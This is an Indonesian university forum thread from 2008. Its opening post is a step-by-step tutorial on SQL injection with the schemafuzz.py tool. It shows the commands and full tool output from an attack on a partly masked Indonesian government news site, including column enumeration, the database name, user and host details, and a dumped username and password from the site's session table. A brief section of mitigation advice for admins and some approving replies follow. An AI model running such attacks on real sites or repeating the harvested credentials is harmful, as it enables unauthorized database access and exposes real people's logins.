UNKLAB FORUM
Would you like to react to this message? Create an account in a few clicks or log in to continue.

UNKLAB FORUM

Forum Mahasiswa & Alumni Universitas Klabat
 
HomeSearchLatest imagesRegisterLog in
Bagi Guest atau user yang tidak terdaftar, mohon maaf karena ada beberapa thread tidak bisa diakses oleh guest, oleh karena itu, sebaiknya anda registrasi terlebih untuk bisa mengakses penuh forum ini. Baca dulu peraturan forum ini. Terima Kasih
Navigation
 Index
 Memberlist
 Profile
 FAQ
 Search
Search
 
 

Display results as :
 
Rechercher Advanced Search
Latest topics
» Lowongan Pekerjaan PT. PNM (Persero)
Hacking SQL Injeck dengan Schemafuzz I_icon_minitimeWed Nov 08, 2017 7:01 pm by CLiFF

» .NET Programming
Hacking SQL Injeck dengan Schemafuzz I_icon_minitimeTue Mar 15, 2011 6:49 pm by Marvin07

» Bagaimana Menginstal OS dari USB???
Hacking SQL Injeck dengan Schemafuzz I_icon_minitimeThu Feb 10, 2011 9:55 pm by unaitech

» Automatic Installation BackTrack 3 Final | Dual Booting
Hacking SQL Injeck dengan Schemafuzz I_icon_minitimeThu Feb 10, 2011 9:53 pm by unaitech

» simple hacking test
Hacking SQL Injeck dengan Schemafuzz I_icon_minitimeThu Feb 10, 2011 7:38 pm by and213

» [tutor] How To Patch SQL Injection Bug
Hacking SQL Injeck dengan Schemafuzz I_icon_minitimeThu Feb 10, 2011 9:52 am by unaitech

» what ur distro..?
Hacking SQL Injeck dengan Schemafuzz I_icon_minitimeThu Feb 10, 2011 9:48 am by unaitech

» netcut source-code
Hacking SQL Injeck dengan Schemafuzz I_icon_minitimeThu Feb 10, 2011 9:44 am by unaitech

» Ragnarok Online
Hacking SQL Injeck dengan Schemafuzz I_icon_minitimeMon Jan 31, 2011 1:57 pm by Marvin07

FRIENDS
Ads

    No ads available.



     

     Hacking SQL Injeck dengan Schemafuzz

    Go down 
    5 posters
    AuthorMessage
    y0ng_en9el
    Pro
    Pro



    Male Number of posts : 919
    Age : 38
    Location : In your heart
    Points : 78
    Registration date : 2008-06-10

    Hacking SQL Injeck dengan Schemafuzz Empty
    PostSubject: Hacking SQL Injeck dengan Schemafuzz   Hacking SQL Injeck dengan Schemafuzz I_icon_minitimeThu Dec 11, 2008 12:23 pm

    Hacking SQL Injeck dengan Schemafuzz
    -----------------------------------------------

    I. KATA PENGANTAR
    II. LANGKAH-LANGKAH AWAL
    III.PEMBAHASAN
    IV. PESAN UNTUK ADMIN DAN WEB PROGRAMMER
    V. PENUTUP
    VI. REFERENSI


    I. KATA PENGANTAR
    ------------------------

    Ketemu lagi dengan saya y0ng_en9el Hacking SQL Injeck dengan Schemafuzz 45471, disini saya akan menjelaskan teknik hacking SQL Injeck dengan menggunakan Schemafuzz. Schemafuzz adalah script hacking pemmogramman python, yang saya ambil di forum darkc0de. Di schemafuzz ini kita di mudahkan untuk tester site / web, hanya dengan modal menguasai command atau perintahnya, kita bisa melihat isi database pada site tersebut, tapi disini saya tidak mengajarkan kalian untuk melakukan tindak kejahatan atau kriminal pada site disini saya hanya mau kalian menjadi baik dalam menggunakan ilmu pengetahuan. Karena hacking itu baik. Kayaknya cukup deh saran saya untuk melakukan dengan bijak teknik hacking ini. Sekarang kita masuk dalam pokok pembahasan. Hacking SQL Injeck dengan Schemafuzz 68368



    II. LANGKAH-LANGKAH AWAL
    ----------------------------------

    1. Download Python : http://www.python.org/download/

    2. Download Schemafuzz : http://www.kitaupload.com/download.php?file=581schemafuzz.py

    3. Sini saya mendapatkan site government, dengan segala kurang hormat site ini saya sensor, dengan alasan rasa kasihan. pada admin web, Xixixxixi. Contoh disini kita mendapatkan bug SQL pada www.min****.go.id

    4. www.min***.go.id/news_show.php?id=1' [SQLi]


    III. PEMBAHASAN
    ---------------------

    5. Buka CMD trus cari lokasi Schemafuzz.py (contoh disini lokasi Schemafuzz.py saya ada di drive C:\)

    6. Sekarang kita ketik pada command C:\>schemafuzz.py -u "http://www.min****.go.id/news_show.php?id=1" --findcol
    Tampillah

    Code:

    |---------------------------------------------------------------|
    | rsauron[@]gmail[dot]com                                v5.0  |
    |  6/2008      schemafuzz.py                                  |
    |      -MySQL v5+ Information_schema Database Enumeration      |
    |      -MySQL v4+ Data Extractor                                |
    |      -MySQL v4+ Table & Column Fuzzer                        |
    | Usage: schemafuzz.py [options]                                |
    |                      -h help                    darkc0de.com  |
    |---------------------------------------------------------------|

    [+] URL:http://www.min****.go.id/news_show.php?id=1--
    [+] Evasion Used: "+" "--"
    [+] 15:00:20
    [+] Proxy Not Given
    [+] Attempting To find the number of columns...
    [+] Testing: 0,1,2,3,4,5,
    [+] Column Length is: 6
    [+] Found null column at column #: 1
    [+] SQLi URL: http://www.min****.go.id/news_show.php?id=1+AND+1=2+UNION+SELECT+0,1,2,3,4,5--
    [+] darkc0de URL: http://www.min****.go.id/news_show.php?id=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5
    [-] Done!


    7. Sekarang untuk mencari info databasenya dan versi berapa yang dipake atau tabel, kita ketik sebagai berikut, C:\>schemafuzz.py -u "http://www.min****.go.id/news_show.php?id=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --fuzz
    dan akan tampil

    Code:

    |---------------------------------------------------------------|
    | rsauron[@]gmail[dot]com                                v5.0  |
    |  6/2008      schemafuzz.py                                  |
    |      -MySQL v5+ Information_schema Database Enumeration      |
    |      -MySQL v4+ Data Extractor                                |
    |      -MySQL v4+ Table & Column Fuzzer                        |
    | Usage: schemafuzz.py [options]                                |
    |                      -h help                    darkc0de.com  |
    |---------------------------------------------------------------|

    [+] URL:http://www.min****.go.id/news_show.php?id=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
    [+] Evasion Used: "+" "--"
    [+] 15:03:12
    [+] Proxy Not Given
    [+] Gathering MySQL Server Configuration...
       Database: min***go_news
       User: min****go_berita@boscgi1101.eigbox.net
       Version: 5.0.51a-log
    [+] Number of tables names to be fuzzed: 338
    [+] Number of column names to be fuzzed: 249
    [+] Searching for tables and columns...

    [+] Found a table called: session

    [+] Now searching for columns inside table "session"
    [!] Found a column called:username
    [!] Found a column called:userid
    [!] Found a column called:userpassword
    [-] Done searching inside table "session" for columns!

    [-] [15:28:31]
    [-] Total URL Requests 588
    [-] Done


    8. Database: min***go_news | User: min****go_berita@boscgi1101.eigbox.net | Version: 5.0.51a-log [akhirnya dapat databse, user dan versi sql Hacking SQL Injeck dengan Schemafuzz 62082]

    Kita telah lihat database, user, versi SQL dan table. Sekarang kita akan mencari username dan passwordnya. C:\>http://www.min****.go.id/news_show.php?id=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5-- --dump -D min****go_news -T session -C username,userpassword
    dan akan tampil

    Code:

    |---------------------------------------------------------------|
    | rsauron[@]gmail[dot]com                                v5.0  |
    |  6/2008      schemafuzz.py                                  |
    |      -MySQL v5+ Information_schema Database Enumeration      |
    |      -MySQL v4+ Data Extractor                                |
    |      -MySQL v4+ Table & Column Fuzzer                        |
    | Usage: schemafuzz.py [options]                                |
    |                      -h help                    darkc0de.com  |
    |---------------------------------------------------------------|

    [+] URL:http://www.min****.go.id/news_show.php?id=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
    [+] Evasion Used: "+" "--"
    [+] 16:22:07
    [+] Proxy Not Given
    [+] Gathering MySQL Server Configuration...
       Database: min****go_news
       User: min****go_berita@boscgi1103.eigbox.net
       Version: 5.0.51a-log
    [+] Dumping data from database "min****go_news" Table "session"
    [+] Column(s) ['username', 'userpassword']
    [+] Number of Rows: 2

    [0] min****go:am****ng:
    [1] ferry:kapitu:kapitu:

    [-] [16:22:20]
    [-] Total URL Requests 4
    [-] Done


    9. Hasilnya ferry:kapitu:kapitu: [ user : ferry dan password : kapitu ] Hacking SQL Injeck dengan Schemafuzz 90965

    10. Saya telah melaporkan bug site tersebut dan mudah-mudahan adminnya lansung ambil tindakan.Hero



    IV. PESAN UNTUK ADMIN DAN WEB PROGRAMMER
    -----------------------------------------------------------
    1. Melakukan filter terhadap variabel yang menjadi parameter di dalam melakukan query ke database. Contoh query untuk menampilkan news_show.php berdasarkan ID yang di pilih :
    Code:

    $sql = "SELECT * FROM news_m WHERE id_news = ".$_GET['id']."";
    $hasil = mysql_query($sql, $conn);


    Code:
    $_GET['id'] diambil dari url
    karena tidak di filter maka user dari luar bisa melakukan attack. Contoh : melalui url address http://www.target.com/news_show.php?id=5+and+1=2.

    2. Pencegahannya,kita harus gunakan sintaks sprintf. Contoh, sintaks di atas akan menjadi seperti ini :
    Code:

    $sql= sprintf("SELECT * FROM news_m WHERE id_news = %d;", $_GET['id']);
    $hasil = mysql_query($sql, $conn);

    3. Matikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang berjalan.

    4. Ubah "Startup and run SQL Server" menggunakan low privilege user di SQL Server Security tab.

    5. Up to date pada server webnya

    Hacking SQL Injeck dengan Schemafuzz 68368 Hacking SQL Injeck dengan Schemafuzz 68368


    V.PENUTUP
    -------------

    Selesai deh penjelasan singkat saya teknik hacking SQL Injeck dengan menggunakan schemafuzz, tools ini hanyalah altrenative bukannya saya mengajarkan kalian asik dan terus menerus memakai tools schemafuzz, sekalian kalian belajar bahasa pemogramman web PHP,ASP,JSP,KSP,Etc. Karena tak selamanya tools bisa menyelesaikan segala cara, tools hanyalah media, yang selanjutnya otak kita yang bekerja diibaratkan seperi kita sekolah / kuliah menggunakan alat tulis-menulis selanjutnya otaklah yang bekerja Dengan segala kurang hormat saya minta maaf kalau ada kesalah pahaman dalam tutorial saya.

    Pesan Pembaca : Gunakanlah ilmu atas dasar pembelajaran bukan atas dasar kejahatan karena ilmu pengetahuan itu baik.

    Thanks to : My GOD Jesus Christ | My Family | moon_lee Surprised | Cliff | Animonzter | Cokiki | Sacrofia | M_Negro | Anime | Jzt_nwbie | Akiko | b1beh^Pink | tasya | C6 |

    Sahabat˛ yg tdk bisa di persebutkan satu persatu namanya Very Happy

    God Bless U To All

    Hacking SQL Injeck dengan Schemafuzz 922781 Hacking SQL Injeck dengan Schemafuzz 922781 Hacking SQL Injeck dengan Schemafuzz 922781

    VI. REFERENSI
    -----------------
    http://www.google.com
    http://www.forum.darkc0de.com

    Copyright © 2008 y0ng_en9el - Hikari-Community Corp


    Last edited by y0ng_en9el on Thu Dec 11, 2008 1:58 pm; edited 2 times in total
    Back to top Go down
    http://hikari-community.co.nr
    jzt.nwbie
    Administrator
    Administrator
    jzt.nwbie


    Male Number of posts : 529
    Location : /home/jzt.nwbie
    Points : 109
    Registration date : 2008-09-16

    Hacking SQL Injeck dengan Schemafuzz Empty
    PostSubject: Re: Hacking SQL Injeck dengan Schemafuzz   Hacking SQL Injeck dengan Schemafuzz I_icon_minitimeThu Dec 11, 2008 1:46 pm

    Very... very... nice... share... k2 y0ng_engel

    lol! lol! lol!

    >> thanks banget Ilmunya..
    Back to top Go down
    Lucifer
    Newbie
    Newbie
    Lucifer


    Number of posts : 5
    Points : 0
    Registration date : 2009-01-10

    Hacking SQL Injeck dengan Schemafuzz Empty
    PostSubject: Re: Hacking SQL Injeck dengan Schemafuzz   Hacking SQL Injeck dengan Schemafuzz I_icon_minitimeSat Jan 10, 2009 7:01 pm

    hy pal, y u didn't use video screen recorder to record that moment when u inject their database?
    Thatz more easy to us to understand how to sql injection using Schemafuzz.
    Back to top Go down
    ZaNo
    Whiz
    Whiz
    ZaNo


    Male Number of posts : 245
    Location : trace me if u can..
    Points : 222
    Registration date : 2009-02-02

    Hacking SQL Injeck dengan Schemafuzz Empty
    PostSubject: Re: Hacking SQL Injeck dengan Schemafuzz   Hacking SQL Injeck dengan Schemafuzz I_icon_minitimeSun Mar 08, 2009 11:06 pm

    perasaan ini EA_Ngel pe tutorial noh..
    Back to top Go down
    jzt.nwbie
    Administrator
    Administrator
    jzt.nwbie


    Male Number of posts : 529
    Location : /home/jzt.nwbie
    Points : 109
    Registration date : 2008-09-16

    Hacking SQL Injeck dengan Schemafuzz Empty
    PostSubject: Re: Hacking SQL Injeck dengan Schemafuzz   Hacking SQL Injeck dengan Schemafuzz I_icon_minitimeWed Mar 11, 2009 4:45 am

    Yoipz

    http://www.sekuritionline.net

    =========================
    klo di forum laeng, dp id EA_Ngel, mar klo disini y0ng_en9el
    Back to top Go down
    doniskynet
    Newbie
    Newbie
    doniskynet


    Male Number of posts : 5
    Location : Skynet Corporation
    Points : 1
    Registration date : 2008-09-26

    Hacking SQL Injeck dengan Schemafuzz Empty
    PostSubject: Re: Hacking SQL Injeck dengan Schemafuzz   Hacking SQL Injeck dengan Schemafuzz I_icon_minitimeWed Aug 26, 2009 10:14 am

    hmm baru mo belajar.....
    Very Happy
    Back to top Go down
    jzt.nwbie
    Administrator
    Administrator
    jzt.nwbie


    Male Number of posts : 529
    Location : /home/jzt.nwbie
    Points : 109
    Registration date : 2008-09-16

    Hacking SQL Injeck dengan Schemafuzz Empty
    PostSubject: Re: Hacking SQL Injeck dengan Schemafuzz   Hacking SQL Injeck dengan Schemafuzz I_icon_minitimeThu Aug 27, 2009 1:03 pm

    doniskynet wrote:
    hmm baru mo belajar.....
    Very Happy

    met bljr bro...
    smangat...
    Back to top Go down
    Sponsored content





    Hacking SQL Injeck dengan Schemafuzz Empty
    PostSubject: Re: Hacking SQL Injeck dengan Schemafuzz   Hacking SQL Injeck dengan Schemafuzz I_icon_minitime

    Back to top Go down
     
    Hacking SQL Injeck dengan Schemafuzz
    Back to top 
    Page 1 of 1
     Similar topics
    -
    » Membuat Windows DLL dengan VB6 (Bukan ActiveX DLL)
    » juz for fun,,,,(Jumlah kalori yang terbakar sehubungan dengan perilaku s3x..) ^^
    » Program Membuat Garis dengan Mouse Pointer (Using Visual C++ with OpenGL).

    Permissions in this forum:You cannot reply to topics in this forum
    UNKLAB FORUM :: KLABAT UNIVERSITY :: Computer Science Faculty :: Computer Security :: Hacking, Cracking, Etc.-
    Jump to: